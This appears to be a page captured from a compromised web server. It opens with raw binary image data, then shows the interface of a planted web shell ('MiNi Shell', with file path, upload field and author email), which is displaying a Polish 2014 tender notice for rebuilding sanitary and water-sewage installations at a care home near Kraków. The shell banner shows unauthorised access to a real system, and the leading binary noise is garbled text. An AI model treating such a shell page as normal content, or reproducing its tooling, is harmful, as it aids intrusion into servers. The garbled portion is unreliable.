JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/129148-N-2014.html

<p class="kh_header"><b>Kraków: Przebudowa budynku Domu Pomocy Społecznej w Batowicach wraz z przebudową instalacji wewnętrznych wod-kan</b><br>
<b>Numer ogłoszenia: 129148 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krakowski , Al. Słowackiego 20, 30-037 Kraków, woj. małopolskie, tel. 12 634 42 70, faks 12 6335294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku Domu Pomocy Społecznej w Batowicach wraz z przebudową instalacji wewnętrznych wod-kan.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa  budynku  Domu  Pomocy  Społecznej  w  Batowicach  wraz
z   przebudową  instalacji  wewnętrznych  wod-kan.
                                                                                                                                                                                                                                                                                                                                                                                                    
Powierzchnia całkowita 1429,6 m2
Powierzchnia użytkowa 1023,8 m2
Kubatura 4445,0 m2

Zakres  rzeczowy przedmiotu zamówienia obejmuje :

1.	Przebudowę trzech i remont  dwóch  węzłów sanitarnych . 

Przebudowa dotyczy  węzła sanitarnego na parterze budynku, (Pawilon II) po prawej stronie od wejścia głównego oraz dwóch węzłów sanitarnych  na  piętrze budynku i dwóch węzłów nad kuchnią.  
Na parterze w węźle oznaczonym literą A zaprojektowano cztery łazienki  w tym  jedną  z wanną dostosowaną  do mycia osób niepełnosprawnych i trzy z prysznicami ( w tym jedna dla osób niepełnosprawnych na wózkach i z prysznicem)  oraz trzy WC. 
Na pierwszym piętrze zaprojektowano dwa węzły sanitarne B i C.  Węzeł B wyposażony został  w  trzy łazienki  w tym jedną z wanną dla osób niepełnosprawnych  oraz   2 z  prysznicami  i  czterema WC. Przebudowana zostanie  także kuchenka dla mieszkańców.
Przebudowa węzła oznakowanego literą C polega na utworzeniu 1 łazienki z wanną dla osób niepełnosprawnych oraz jednym WC dla osób niepełnosprawnych na wózkach. 
Przebudowie podlega również pomieszczenie brudownika. 
Na pierwszym piętrze nad kuchnią  znajdują się jeszcze dwie łazienki i one  zostaną  jedynie wyremontowane. 
We wszystkich pomieszczeniach  podlegających przebudowie i remontowi zastosowano materiały  zmywalne tzn. posadzki z płytek ceramicznych, zmywalne i antypoślizgowe, płytki ceramiczne na ścianach do sufitu również zmywalne  z możliwością użycia środków  przeciwgrzybiczych. Farby do malowania sufitów zmywalne, fugi do płytek ceramicznych z dodatkiem antybakteryjnym  i  przeciwgrzybiczym.
Uwzględniony w projekcie remont dwóch sanitariatów nad kuchnią będzie polegał na wymianie istniejących płytek  ściennych i podłogowych , wymianie istniejących drzwi  wejściowych do sanitariatów na drzwi o wymiarze 90 cm  oraz dołożenie dodatkowych drzwi tworząc przedsionki. W zakres remontu  wchodzi również wymiana ceramiki  sanitarnej  oraz malowanie sufitów .

2.Instalacja  wod-kan

Budynek wyposażony jest w instalację wodno - kanalizacyjną. Ścieki sanitarne               z przyborów przebudowywanych w węzłach sanitarnych  odprowadzane będą do nowych pionów kanalizacyjnych , które należy podłączyć do  istniejących poziomych  ciągów kanalizacyjnych  przebiegających przez część podpiwniczoną budynku oraz do ciągu kanalizacyjnego biegnącego pod posadzką parteru części nie podpiwniczonej. Wymienić  należy  również  instalację  ciepłej  wody wraz  z  cyrkulacją w części podpiwniczonej budynku.
Przewody zimnej wody w części podpiwniczonej i na parterze należy zaizolować taśmą przeciw roszeniu lub prowadzić w płaszczu PCV. Pod pionami przewidziano zawory odcinające , a na odgałęzieniach do pionów zastosować ramiona kompensacyjne. Ciepła  woda  do  poszczególnych przyborów dostarczana będzie z istniejącej kotłowni zlokalizowanej w części podpiwniczonej budynku . 
W załączonej do SIWZ dokumentacji projektowej pokazano przebieg instalacji ciepłej wody , cyrkulacji od rozdzielacza do istniejących i projektowanych przyborów . Przewody rozprowadzające ciepłej wody  i cyrkulacji przewidziano z rur stalowych ocynkowanych,  zaizolowanych pianką poliuretanową w płaszczu PCV lub wełną  szklaną w płaszczu z folii aluminiowej. Pod  pionami należy  zamontować  zawory odcinające  do ciepłej  wody. Dla instalacji ciepłej wody zaprojektowano elektroniczny sposób sterowania procesu  dezynfekcji termicznej  (sterownik).  Temperatura ciepłej wody  55o - 60oC - okresowy przegrzew  70o  C.  Na odgałęzieniach do pionów  oraz  na podejściach  do przyborów  zamontowane zostaną    zawory odcinające do  ciepłej wody. Dla regulacji hydraulicznej na przewodach cyrkulacyjnych zabudowane będą  zawory termostatyczne  regulacyjne. 
Przewody poziome należy zamocować do ścian i stropów  za pomocą haków  i wsporników  umożliwiających  ich podłużny ruch.  W miejscach przejść przewodów przez ściany i stropy należy zastosować tuleje  o średnicy wewnętrznej większej  o min 4 mm od zewnętrznej ściany przewodu. Tuleje powinny być dłuższe  o min 10 mm od grubości przegrody. Przestrzeń miedzy przewodami należy wypełnić materiałem uszczelniającym elastycznym . Przewody  ciepłej wody winny przebiegać poniżej przewodów elektrycznych i centralnego ogrzewania  natomiast powyżej  przewodów zimnej wody i kanalizacji. Na przewodzie cyrkulacyjnym w kotłowni  należy  zamontować pompę cyrkulacyjną  z zegarem sterującym. 
Wewnętrzna kanalizacja sanitarna zostanie wykonana  z rur PCV, piony zakończone będą wywiewką wyprowadzoną ponad dach. Na pionach nad poziomem posadzki  należy zamontować rewizje a przy wyjściu z budynku klapę zwrotną w studzience. Przewody  z projektowanych pionów należy włączyć w piwnicy do istniejącej kanalizacji która biegnie pod posadzką w części podpiwniczonej i nie podpiwniczonej.  W celu uniknięcia dźwięku na przejściach przez stropy należy zastosować tłumiące kołnierze elastyczne. Obejmy rurowe powinny mieć wkładki gumowe i powinny być odpowiednio ściśnięte przy montażu. 

3. Roboty porządkowe

-oczyszczenie terenu  z resztek budowlanych, gruzu i śmieci - zebranie i złożenie zanieczyszczeń w pryzmy,
-przenoszenie w nosiłkach gruzu budowlanego w jednym poziomie na odl. do 20m,
-wywiezienie gruzu pryzmowanego samochodami skrzyniowymi,
-transport pionowy ręczny  elementów lub materiałów o masie całkowitej do 500 kg,
-transport poziomy na wózku elementów lub materiałów o masie całkowitej do 500 kg,
-wywiezienie elementów stalowych samochodami skrzyniowymi,
-mycie posadzek po robotach malarskich.
4. Wykonanie kompletnej dokumentacji powykonawczej, protokoły, atesty - 2 komplety..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę wykonawca zobowiązany jest wnieść wadium przetargowe w wysokości 7 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określił warunku - Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia tj. wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie dwa zamówienia z którego każde ma obejmować wykonanie następujących robót:  wymianę instalacji wodno-kanalizacyjnej,  prace ogólnobudowlane i wykończeniowe malarskie, posadzkarskie, okładziny z płytek ceramicznych- ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu, wykazie robót budowlanych, dowodach czy roboty budowlane zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określił warunku - Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania  osobami zdolnymi do wykonania zamówienia w szczególności dysponują lub będą dysponować osobą/osobami posiadającą/posiadającymi  uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i specjalności instalacje sanitarne. Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże się dysponowaniem dwiema osobami posiadającymi odrębnie uprawnienia w poszczególnych branżach lub wykaże się dysponowaniem  jedną osobą  posiadającą łącznie uprawnienia w branżach o których mowa powyżej - ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu, wykazie osób, oświadczeniu wykonawcy potwierdzającym fakt, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej  tj. są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną 100 000 zł oraz posiadają środki finansowe lub zdolność kredytową w kwocie min. 100 000 zł - ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu, Opłaconej polisie a w przypadku jej braku innym dokumencie potwierdzającym , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - załącznik nr 1
Tabela elementów scalonych - załącznik nr 2.
Wykaz  stawek i narzutów - załącznik nr 3.
Pisemne zobowiązanie innych podmiotów do oddania wykonawcy swojej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia wraz z informacją o zakresie i sposobie udostępnienia zasobów, jeżeli w wykazie wykonanych zamówień wykonawca wskazał doświadczenie innych podmiotów. Poleganie na wiedzy i doświadczeniu  innych  podmiotów  oznacza  ich  rzeczywisty udział w realizacji.
Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia wraz z informacją o zakresie i sposobie udostępnienia zasobów, jeżeli w wykazie osób wykonawca wskazał osoby, którymi będzie dysponował, a które będą brały udział w realizacji zamówienia.
Pisemne zobowiązanie innych podmiotów do oddania wykonawcy swojego potencjału finansowego na okres korzystania z niego przy wykonywaniu zamówienia wraz z informacją o zakresie i sposobie udostępnienia zasobów, jeżeli wykonawca będzie polegał na potencjale finansowym innych podmiotów.
Formularz  o  podwykonawcach - załącznik nr 7. 
Pełnomocnictwo do reprezentowania wykonawcy w postępowaniach o udzielenie zamówienia publicznego w tym do podpisywania oferty  i pozostałych dokumentów przetargowych, jeżeli  osoba dokonująca tych czynności nie jest wykazana  w dokumencie rejestracyjnym jako osoba uprawniona do reprezentacji Wykonawcy.  
Certyfikaty, aprobaty techniczne oraz badania wykonane przez niezależne instytucje badawcze. Dokumenty te mają potwierdzać, że zastosowane przez wykonawcę materiały, technologie i urządzenia spełniają warunek równoważności w stosunku do przyjętych w dokumentacji projektowej i potwierdzą całkowitą  ich zgodność  z  obowiązującymi w tym zakresie normami.
Dowód wniesienia wadium - kserokopia
Pełnomocnictwo  do reprezentowania  podmiotów  występujących  wspólnie. Wykonawcy występujący wspólnie (konsorcjum) muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego.   
Informacja o zastosowaniu materiałów zamiennych  - załącznik nr 10
W przypadku gdy Wykonawca nie załączy do oferty formularza stanowiącego załącznik nr 10 do siwz lub załączy go bez żadnej adnotacji  Zamawiający uzna, że Wykonawca nie zastosuje materiałów zamiennych.
Oświadczenie dotyczące przynależności do grupy kapitałowej - załącznik nr 11.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy.
Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy:
- w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy , 
- w zakresie zmiany terminów realizacji poszczególnych czynności w ramach realizacji zamówienia, gdy nie zagraża to prawidłowej realizacji całego zamówienia a jest uzasadnione usprawnieniem procesu budowlanego, warunkami bezpieczeństwa lub decyzją zamawiającego o dokonaniu zmian w sposobie wykonania nadzorowanych robót budowlanych.
Zmiany mogą dotyczyć także:
- ograniczenia zakresu przedmiotu zamówienia w szczególności w przypadku powstania okoliczności  powodujących,  że wykonanie tego zakresu nie leży w interesie publicznym,
- w przypadku powstania okoliczności których nie można było przewidzieć w chwili zawarcia umowy. 
- zmiany osób posiadających uprawnienia, o których mowa w części B pkt 1.3 uzasadnionych koniecznością następstwa z powodów losowych.
Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy,  faktu zaistnienia  okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków, Al. Słowackiego 20, pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2014 godzina 10:00, miejsce: Kraków, Al. Słowackiego 20, pok. 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com